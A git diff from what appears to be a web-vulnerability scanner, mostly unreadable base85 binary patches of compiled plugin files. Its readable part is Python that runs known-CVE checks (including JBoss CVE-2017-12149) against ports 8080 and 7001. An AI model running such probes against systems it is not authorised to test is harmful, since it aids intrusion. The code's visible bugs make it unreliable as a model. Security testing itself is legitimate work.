zfljhSgf3oXv?Prmu|mZ^bvM%wBt_+r;uaFNyuH&Nu}3GirFys=s@N^JVaPSAVY4B> zj%qrJzrkMSx_>T?Vr2O0VBGP(zEAuStF#mutQRdvb!7C_)IthODyNn=8`2nAN9ky} sEI&n`bRPaVXZerWoTY!otqe)+7qjg+N`W{W1L^++QV6G)vWz1C52Bm~(*OVf literal 2257 zcmbVOJ!~9B6rP#=y&wNz5<51Lup)wV$e}<~QG`NB6e$u0DMk(}JFE5X#=if%nZ4wE z+NCi<2nA#zswjnBLP1GMK}ChAr-dd+G$~W@y;)xpgezvXZ{C}EGw=J}?7g{bGc#3& zHuv}AEiuQ~A7o6M1LZ1SHGoK1!aFP|dmeCOi$Iv(3M|vxft|9JbL1xCnDf%t3%pcd z%r~-^Lom12C)Kcw2uu?TqTy-LSK8||RhBfRuE!%OaVX)vW+&CIRGDlJbQSQr zgT4fQZ4dgf(oVdW#_fh9T|m2pCoZLD{9S1yrC$~ft=_+zc$qk0OhCwCM7Ypd|a z7vNo?h}(;WpZmGja&QC>b33Ubo;`fH$)Jn2Eq}>e_|_1;zGToGAlfDy-nCigwX5<^ z&gjY9%s;9eGn)Mrvv=@fj}rGx8!Y9wux6LpAy+tR(x%uC`S`PP1R3DlgQBwkBkVcE zoX1Koe;Yr7{ffc+O;H_x0c*inlcGjk|HZTlrWG)K)i8Y%z9rL@7fi9|{VCT&KD<9= zi}72To1DpNODs7HzJ@vU#k`u=?ukXVWEf)2txaGZUfD!0dKb!EVD;0}veA2VhwW$M z9(Dt37{4dl(u02OBhHKAJ3yJ)fSSkO9VhB_(;S%zzQ*ntq#Nj;o4p&Y%2>H`# zzQYxq=*ngpXKC4FVd$UyB+spvMTdU&!JJHoqf})oEDKX$-Mq1(-9aRyt_mELHYe$% z`UxuMrT3|FHmq{-SuEDxUK%B-q+ekt+I?a+^wcPhQ>7;U>e?zQ-sRQ6{`jNY8`@5y zEDCB-(rxy_osm>+ZEwg?s(q@}Jwr0y`e06eeZMy98 zMYTFz2whugFKN^bOzlR40Zd6HTKiM3+QN09?JON<+8M}ZFVmG9<2W^?SywU{#pzBI zw{^u#hUqvCP=iz!Sfi|iy{Q73ViQ;>O(s-OJ3$!sMqNqiF~Bufa)}H>^Xr))_Q#Uj3!hb=~9PLDF z%kf3%=kYG`$;`9_n%cVFaOu{dvq05F1un}f^m-T$M^UGokriN+XGjq4m$(>KRCUb- zNo7<~s(kKSzSo%3mfBZxmFDTcLtwX5zb7w3MTw8HJ^4CKQ6<(MZU*yBc+rlcIRZwt qJ`5$5=%D)IHZM=t?eEZCc^Vq+Un!ZqM|-OU2tYb{D8pxvnSTJE>Jsb# 
diff --git a/plugins/__pycache__/resin_plugin.cpython-37.pyc b/plugins/__pycache__/resin_plugin.cpython-37.pyc index 521ec974addb4c7c8c8fbc31191d43d74211e20a..cee7b258d2f2f4928fa02c69e7a7dbf96ae88972 100644 GIT binary patch delta 279 zcmdnTbDfXZiI*c|Q@@f5{$Mleq)oiRlg2$fM} zRnTNrQDoJivXW4}>Im6%wkU=ajbH{%&08!1{=p$ty81<_#hH1!iJPSu4>PltMgyHR zxsk=6=UM0KXZ`(8*Y!N>m@xS+i;`2R6i`ZE)yP0kFQz;-NjEbu4OvYUhrX(DnqF3M fL8%B>A%ughWHKjf5o>7;$OdlK0#qBSSq}pM5)xd& delta 177 zcmcc4w~vR{iISxKl~WrS=xTNFczN-%?_>MfQ4|KN}+UHzie;>6;!#lNuAoUySr5r0jLe>3y6(eM$RFO!eGpB6&jkYaJ+Ybkh+T@)zJZ zAa#&uAnZ4&KAISnF-06t4Q^Jb!so!Mvp zROZybKp5?zlTQ}n^<$rY#b{z-^e*5*Wt~IKdvY28dvEQd*ATZ4vWG^iDoZf2D|_0I zIZl4aNa!u@v=)RDmSr-Gg~yL*62`!{a9$~sO5Ug(MQTe0LyD;6kk+JfK?$4jkaFQY zA4N&Y(_$!W*)uMzK>^d^2s5ORFe-*`)4r(9?qI^183HE)^UsJjA=j^$?MJROE0g|?vd)aB1iS>idvUUxjT6gpJvHpIW}w+l#5*;_4@M% Dxx;1` literal 0 HcmV?d00001 
diff --git a/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc b/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..ea12fb7bd20b429d98acfba0d2adb6d4d3131c44 GIT binary patch literal 2210 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 O0{LlxXyLIhx&AK=s;bTa literal 0 HcmV?d00001 
diff --git a/plugins/__pycache__/tomcat_plugin.cpython-37.pyc b/plugins/__pycache__/tomcat_plugin.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..283c1f4648881ce7c87f6e53d3160d3852443030 GIT binary patch literal 287 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 literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/user_agent.cpython-37.pyc b/plugins/__pycache__/user_agent.cpython-37.pyc index 72c6ef54a99da72b75ff219ac1edcfa747fb2fbf..da4cac22509e5ff528f1075615a68279ead5ee72 100644 GIT binary patch delta 265 zcmZoZ$oT6ZBd-%LFBbz4e9)N}^K&AvKjXcPvF8~@Q=XM_ zH^;ir)o+ zk*;HUYF>#Z(=E25#JrUJ+*@qP8Tpx$&ErHE**5#c{bRJ`0D3}`sfYzg6@l1AY^Ve~ Xkb8^6CO1E&G$+-L3CJr35gd#F`two* delta 116 zcmex$kg@q7Bd-%LFBbz4+)$q#(>#&apYhtp*z=4$B@7D~YZw+X1~X_r-R!{hK6>)J xI2A^g&4=UuF)ABjn<}09L z&7)#QJ3BMg?sm0WD8c*ub@w6rG=)Db#oWr!l?W>HOB6qG%2>QKrg%^|yH{<=s%`i@ z>8Gq|q%OqK2G3mzHa1}#OZz`?jtZ(_ej4m7NX?N6n7mV$@pJEfAxxO9(W~Xn;>6HtSS@EA= DHuOqM literal 0 HcmV?d00001 
diff --git a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..49f48570c6e873d6f9a60286826b54a76157fb7e GIT binary patch literal 1607 zcmaJ>&rj4q6rSm?ZM(a;Aw-E9<8=?fvdgY3F~*1_9*~1Xg@&XlZCMK4wwcZbmO!GB z#486c8WP!?CjJHf4W2xiUX4cn1y8=|N@>B;$-MdYecw#qzIm??%Vib8bNK4RswE-x zgZ(&tH~>5EP_MB=m7ZledKi-R zMU$n9JpxP_<{ZrM8-}#ueU74IyoWZqW8UHh7%V@)1H8}oD^xfZ_xL?-0Ev8oyqf}| z(w0gdW5fn6Si);a_X_g3Wz-*~@=$Gw14wpCzmw>tj9$sne@yg+j9$&re^2ysN?)PH zO!T*g(H~+0*U1LNucY*&v~=$LvmLX^4mGo*oV&wKb`(=PDs&_#rlUk(%IL4;=)WfV z@|oU3P>3Uo&dLphb_*Mn2D4LByD|eIpx$+M_37%o{rlkkucOaD-+VcF`;I_8ptNRK zuo+F3X62hp4~zLS8cI8t9@h0`H1xqmI@1JM`YQW(r!A48s+C9zeRIpEQMqH&4L_u7 zeb4CH5#J+jB!-kY0bxB9@ucTP%KVOL2h{PsNDPSMQNja9SaT7P8Te8m!upI9m{FKv z-?6F?@doKclIeTvPA3uqpU{YNf=`IB@ct}6nq3Y0=7vGK69MrzZIiApPCRie%eA)+ zVlSD7chM2Jy^iCBtK0UP>vtSe4+GnD3|Ai#`ee|L#`DM$yf<6`gRp?dISyCw2n-I7 z=B$-i!FZ-TTTlILCF5{jwWN*x3vDuad*GXKCjXnVI9qYvl9Z7moD?4yXDDT^0TIdf Uy1vzO?fdL@!Z9! {}:{}'.format(ip, port)) + else: + print("不存在 CVE_2017_12149 反序列化漏洞") + except Exception: + print("CVE_2017_12149 检测函数出错") +def jboss_special_plugin_(arg,config): + CVE_2017_12149(arg,config) + diff --git a/plugins/plugins.py b/plugins/plugins.py index b8c14c5..ef0940f 100644 --- a/plugins/plugins.py +++ b/plugins/plugins.py 
@@ -4,73 +4,127 @@ import requests import os import json import traceback +from concurrent.futures import ThreadPoolExecutor +from plugins.special_plugin_ import special_plugin_ sys.path.append("plugins") import plugins current_file=os.path.dirname(os.path.abspath(__file__)) from user_agent import get_user_agent class plugins(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,config): + self.arg=arg + self.config=config + self.url=arg.url + self.options=arg.options + self.ThreadNum=config.ThreadNum + self.Timeout=config.Timeout + self.vuln=[] + self.port=config.port def run(self): + print("\n第一部分standard_poc 测试开始:") + print("***********************") files=os.listdir(current_file) - for file in files: - if "_plugin.py" in file: - module=file.rstrip(".py") - pocs=__import__(module).pocs - self.check(pocs) + list_8080=["axis","glassfish","jboss","resin","spring","tomcat","struts2"] + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for file in files: + if "_plugin.py" in file: + module = file.rstrip(".py") + pocs = __import__(module).pocs + module=module.strip("_plugin") + if module in list_8080: + self.port=8080 + if module in ["weblogic"]: + self.port=7001 + excetor.submit(self.check(pocs)) + if self.vuln: + print("\n\n\n第一部分 standard_poc 测试出的漏洞有:") + for vuln in self.vuln: + print(vuln) + else: + print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。") + print("\n\n\n第二部分:\n开始测试特定的poc脚本:") + print("***********************") + special_plugin_(self.arg,self.config) + def request_get(self,url,params,data,flags,success_num,success,fail,pocs): + try: + headers = get_user_agent() + s = requests.get(url=url+":"+self.port, params=params, headers=headers,timeout=self.Timeout) + if not flags: + if s.status_code!=404: + self.vuln.append(self.url+success) + for flag in flags: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + self.vuln.append(success + " \npocs: \n" + pocs) + print(success + " \npocs: 
